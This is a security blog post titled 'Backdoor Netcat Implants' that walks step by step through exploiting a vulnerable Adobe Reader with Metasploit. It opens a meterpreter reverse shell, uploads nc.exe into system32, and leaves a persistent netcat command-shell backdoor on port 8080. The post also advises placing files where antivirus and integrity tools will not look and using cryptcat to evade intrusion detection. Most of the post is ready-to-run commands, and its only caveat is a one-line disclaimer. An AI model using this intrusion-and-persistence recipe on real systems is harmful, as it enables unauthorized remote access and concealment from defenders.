Welcome to the SecurityisFutile blog

I welcome comments and suggestions, I take criticism very lightly (at least most of the time). My goal for this blog is to document various experiments and research projects I feel are both relevant and prominent in the field of computer security (or lack there of) and share my results and experiences with other fellow computer security enthusiests. Most of my topics are based soley on open source technology and methodology, mostly due to availability and cost. I believe that effective security measures help keep people honest with their technology, for the most part. Security is futile (usless) or at least it feels that way when an inspired opportunist comes around and exploits your weaknesses. With that being said I leave you with a quote of inspiration; There is no security on this earth, there is only opportunity.-- General Douglas MacArthur

Friday, May 28, 2010

Backdoor Netcat Implants

Netcat is a useful security/networking tool that has been around since the dawn of the dinosaurs. However, it still holds credibility amongst security professionals even today, probably due to its inherent features and versatile design that make it an effective "swiss army knife" for most computer enthusiasts. Penetration tests some times require the security professional to maintain access to the compromised target even when he looses the original avenue of attack. A network IPS, Firewall, Virus detection defense mechanism could trip after the fact, like when trying to implant a Trojan or Virus as your backdoor. This could cause your Metasploit meterpreter shell to loose connection with its session/target and even create a new policy to block your IP address. After working so hard to get the client side attack to exploit you wouldn't want all of your hard work to go in vein.

Using netcat (or cryptcat) to pop command shells from the compromised target to alternate ports/IP addresses is still an effective way of staying under the radar and maintaining access to the compromised target. For instance, not all anti-virus software will detect the presence of the nc.exe program. Its not to say you couldn't do all of this with Metasploit or some other tool but its cool to use alternative methods and change it up sometimes ;-)

(I don't condone unethical hacking. Use at your own risk!!!)

Example (Objectives):
  1. Target Image: Windows XP running vulnerable version of Adobe Reader (7, 8)
  2. Attack Image: Whatever you want
  3. Pop a shell on a windows target using the client-side Metasploit Universal Adobe exploit
  4. Upload "nc.exe" to a safe location (maybe some place where a virus scanner wouldn't be running and an integrity checking tool wouldn't be monitoring) on the compromised target and start a netcat/cryptcat listener running the "cmd.exe" command on a common port
  5. On the attack system, use netcat to connect to the listening port on the compromised system...bam...instant command shell (if you use cryptcat you will have encryption to help evade a network IDS)
  6. Perform as many times as necessary, but not too much! Remain stealth!
Steps (Modify as necessary. This is just a guide):
  • On the attack image launch the metasploit 3.x command console
command: msfconsole

  • Use the Adobe Acrobat universal exploit. You can search for it in msfconsole
command: search adobe
command: use exploit name

  • You should now be using the exploit name. Set the options for the payload/exploit
command: options
(set all of the values you need)

command: set LHOST yourip
command: set SRVPORT 80
command: set URIPATH adobe
command: set payload windows/meterpreter/reverse_tcp
command: exploit
(should start http listener on your attack image)

  • On your Windows XP target, open a browser window and put in the http://ipaddress/adobe/urlstring to launch the exploit(Adobe should attempt to run the document and hang)
  • On your attack system see if the exploit ran successfully
command: sessions -i number

(Metasploit will tell you if the exploit was successful and if a session was created with the compromised system. If not...try again or try another exploit/avenue of attack...)

  • If all went well you should now be in your new session.

  • Now use the meterpreter shell to upload the nc.exe program to the compromised system

  • Copy the nc.exe file to the attack system installdirectory/Framework3/msf3 directory. This is where you rmeterpreter shell will attempt to grab the nc.exe program from when you use the upload function

  • Now run the upload command in the meterpreter shell to upload nc.exe to the target's system32 directory
command: upload -r nc.exe

  • Now use meterpreter to execute the nc.exe file and run as a service in the background
command: execute -f "nc.exe -L -p 8080 -d -e cmd.exe"
(The process should be created on the compromised system)

  • Use netcat on your attack image to connect to the port hosting the command shell (cmd.exe)
command: nc -v -n targetip 8080

Now you should have another remote back door. Connect as many times as you want and open up as many shells as you need. Then Close out of your meterpreter session, close metasploit.....look....you still have a shell :-)


http://blogs.msdn.com - netcat picture
http://www.ol-service.com/sikurezza/doc/netcat_eng.pdf - netcat command syntax

No comments:

Post a Comment